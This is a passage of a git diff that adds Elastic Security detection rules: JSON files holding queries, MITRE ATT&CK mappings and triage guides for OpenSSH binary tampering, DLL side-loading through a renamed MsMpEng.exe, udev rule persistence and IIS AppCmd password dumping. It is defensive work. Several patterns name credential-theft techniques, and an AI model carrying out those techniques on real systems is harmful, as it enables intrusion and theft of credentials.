"## Triage and analysis\n\n### Investigating Modification of OpenSSH Binaries\n\nOpenSSH is a widely used suite of secure networking utilities based on the Secure Shell (SSH) protocol, which provides encrypted communication sessions over a computer network.\n\nAdversaries may exploit OpenSSH by modifying its binaries, such as `/usr/bin/scp`, `/usr/bin/sftp`, `/usr/bin/ssh`, `/usr/sbin/sshd`, or `libkeyutils.so`, to gain unauthorized access or exfiltrate SSH credentials.\n\nThe detection rule 'Modification of OpenSSH Binaries' is designed to identify such abuse by monitoring file changes in the Linux environment. It triggers an alert when a process, modifies any of the specified OpenSSH binaries or libraries. This helps security analysts detect potential malicious activities and take appropriate action.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False positive analysis\n\n- Regular users should not need to modify OpenSSH binaries, which makes false positives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator that performed these actions for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:file and host.os.type:linux and event.type:change and \n process.name:(* and not (dnf or dnf-automatic or dpkg or yum or rpm or yum-cron or anacron or platform-python)) and \n (file.path:(/usr/bin/scp or \n /usr/bin/sftp or \n /usr/bin/ssh or \n /usr/sbin/sshd) or \n file.name:libkeyutils.so) and\n not process.executable:/usr/share/elasticsearch/*\n", + "references": [ + "https://blog.angelalonso.es/2016/09/anatomy-of-real-linux-intrusion-part-ii.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "0415f22a-2336-45fa-ba07-618a5942e22c", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + }, + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "0415f22a-2336-45fa-ba07-618a5942e22c_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_109.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_109.json new file mode 100644 index 00000000000..544aa123d81 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Dennis Perto" + ], + "description": "Identifies a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of one of those processes.", + "false_positives": [ + "Microsoft Antimalware Service Executable installed on non default installation path." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Microsoft Antimalware Service Executable", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (process.pe.original_file_name == \"MsMpEng.exe\" and not process.name : \"MsMpEng.exe\") or\n (process.name : \"MsMpEng.exe\" and not\n process.executable : (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Security Client\\\\*.exe\"))\n)\n", + "references": [ + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "053a0387-f3b5-4ba5-8245-8002cca2bd08_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_110.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_110.json new file mode 100644 index 00000000000..4da767e61b4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_110.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Dennis Perto" + ], + "description": "Identifies a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side-loading a malicious DLL within the memory space of one of those processes.", + "false_positives": [ + "Microsoft Antimalware Service Executable installed on non default installation path." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential DLL Side-Loading via Microsoft Antimalware Service Executable", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (process.pe.original_file_name == \"MsMpEng.exe\" and not process.name : \"MsMpEng.exe\") or\n (process.name : \"MsMpEng.exe\" and not\n process.executable : (\"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft Security Client\\\\*.exe\"))\n)\n", + "references": [ + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.002", + "name": "DLL Side-Loading", + "reference": "https://attack.mitre.org/techniques/T1574/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "053a0387-f3b5-4ba5-8245-8002cca2bd08_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_3.json b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_3.json new file mode 100644 index 00000000000..c361e1bad70 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_3.json @@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Monitors for the creation of rule files that are used by systemd-udevd to manage device nodes and handle kernel device events in the Linux operating system. Systemd-udevd can be exploited for persistence by adversaries by creating malicious udev rules that trigger on specific events, executing arbitrary commands or payloads whenever a certain device is plugged in or recognized by the system.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Persistence Through Systemd-udevd", + "new_terms_fields": [ + "host.id", + "process.executable", + "file.path" + ], + "query": "host.os.type:\"linux\" and event.category:\"file\" and\nevent.type:(\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and\nfile.path:/lib/udev/* and process.executable:* and not (\n process.name:(\"dockerd\" or \"docker\" or \"dpkg\" or \"dnf\" or \"dnf-automatic\" or \"yum\" or \"rpm\" or \"systemd-hwdb\" or\n \"podman\" or \"buildah\") or file.extension : (\"swp\" or \"swpx\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "054db96b-fd34-43b3-9af2-587b3bd33964", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 3 + }, + "id": "054db96b-fd34-43b3-9af2-587b3bd33964_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_109.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_109.json new file mode 100644 index 00000000000..d6ecc600a2c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_109.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Service Account Password Dumped", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/list\" and process.args : \"/text*password\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "0564fb9d-90b9-4234-a411-82a546dc1343_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_110.json b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_110.json new file mode 100644 index 00000000000..2de0c56166f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/0564fb9d-90b9-4234-a411-82a546dc1343_110.json @@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords. An attacker with IIS web server access via a web shell can decrypt and dump the IIS AppPool service account password using AppCmd.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Microsoft IIS Service Account Password Dumped", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"appcmd.exe\" or ?process.pe.original_file_name == \"appcmd.exe\") and\n process.args : \"/list\" and process.args : \"/text*password\"\n", + "references": [ + "https://blog.netspi.com/decrypting-iis-passwords-to-break-out-of-the-dmz-part-1/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "0564fb9d-90b9-4234-a411-82a546dc1343", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "0564fb9d-90b9-4234-a411-82a546dc1343_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_109.json b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_109.json new file mode 100644 index 00000000000..891e73f0b55 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/05b358de-aa6d-4f6c-89e6-78f74018b43b_109.json @@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by a suspicious parent process, which could be indicative of code injection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Conhost Spawned By Suspicious Parent Process", + "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as the classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and `PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into legitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and 